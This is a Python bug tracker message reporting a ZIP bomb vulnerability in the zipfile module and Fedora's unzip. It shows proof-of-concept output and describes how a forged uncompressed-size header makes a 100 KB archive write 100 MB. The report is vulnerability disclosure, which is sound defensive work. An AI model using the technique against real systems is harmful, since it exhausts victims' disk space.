Author vstinner
Recipients vstinner
Date 2020-01-15.09:57:16
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1579082238.3.0.125873650379.issue39341@roundup.psfhosted.org>
In-reply-to
Content
Laish, Amit (GE Digital) reported a vulnerability in the zipfile module to the PSRT list. The module is vulnerable to ZIP Bomb:
https://en.wikipedia.org/wiki/Zip_bomb

A 100 KB malicious ZIP file announces an uncompressed size of 1 byte but extracting it writes 100 MB on disk.

Python 2.7 is vulnerable.

Python 3.7 does not seem to be directly vulnerable. The proof of concept fails with:

$ python3 poc.py 
The size of the uncompressed data is: 1 bytes
Traceback (most recent call last):
  File "poc.py", line 18, in <module>
    extract() # The uncompressed size is more than 20GB :)
  File "poc.py", line 6, in extract
    zip_ref.extractall('./')
  File "/usr/lib64/python3.7/zipfile.py", line 1636, in extractall
    self._extract_member(zipinfo, path, pwd)
  File "/usr/lib64/python3.7/zipfile.py", line 1691, in _extract_member
    shutil.copyfileobj(source, target)
  File "/usr/lib64/python3.7/shutil.py", line 79, in copyfileobj
    buf = fsrc.read(length)
  File "/usr/lib64/python3.7/zipfile.py", line 930, in read
    data = self._read1(n)
  File "/usr/lib64/python3.7/zipfile.py", line 1020, in _read1
    self._update_crc(data)
  File "/usr/lib64/python3.7/zipfile.py", line 948, in _update_crc
    raise BadZipFile("Bad CRC-32 for file %r" % self.name)
zipfile.BadZipFile: Bad CRC-32 for file 'dummy1.txt'

The malicious ZIP file size is 100 KB. Extracting it writes dummy1.txt: 100 MB only made of a single character "0" (zero, Unicode character U+0030 or byte 0x30) repeated on 100 MB.

The original proof of concept used a 20 MB ZIP writing 20 GB on disk. It's just the same text file repeated 200 files. I created a smaller ZIP just to be able to upload it to bugs.python.org.

Attached files:

* create_zip.py: created malicious.zip from valid.zip: modify the uncompressed size of compressed dummy1.txt
* valid.zip: compressed dummy1.txt, file size is 100 KB
* poc.py: extract malicious.zip

--

The zipfile documentation describes "Decompression pitfalls":
https://docs.python.org/dev/library/zipfile.html#decompression-pitfalls

The zlib.decompress() function has a max_length parameter:
https://docs.python.org/dev/library/zlib.html#zlib.Decompress.decompress

See also my notes on "Archives and Zip Bomb":
https://python-security.readthedocs.io/security.html#archives-and-zip-bomb

--

unzip program of Fedora unzip-6.0-44.fc31.x86_64 package has the same vulnerability:

$ unzip malicious.zip 
Archive:  malicious.zip
  inflating: dummy1.txt 

$ unzip -l malicious.zip 
Archive:  malicious.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        1  03-12-2019 14:10   dummy1.txt
---------                     -------
        1                     1 file

--

According to Riccardo Schirone (Red Hat), p7zip, on the other hand, seems to use the minimum value between the header value and the file one, so it extracts only 1 byte and correctly complains about CRC failures.
History
Date User Action Args
2020-01-15 09:57:18vstinnersetrecipients: + vstinner
2020-01-15 09:57:18vstinnersetmessageid: <1579082238.3.0.125873650379.issue39341@roundup.psfhosted.org>
2020-01-15 09:57:18vstinnerlinkissue39341 messages
2020-01-15 09:57:16vstinnercreate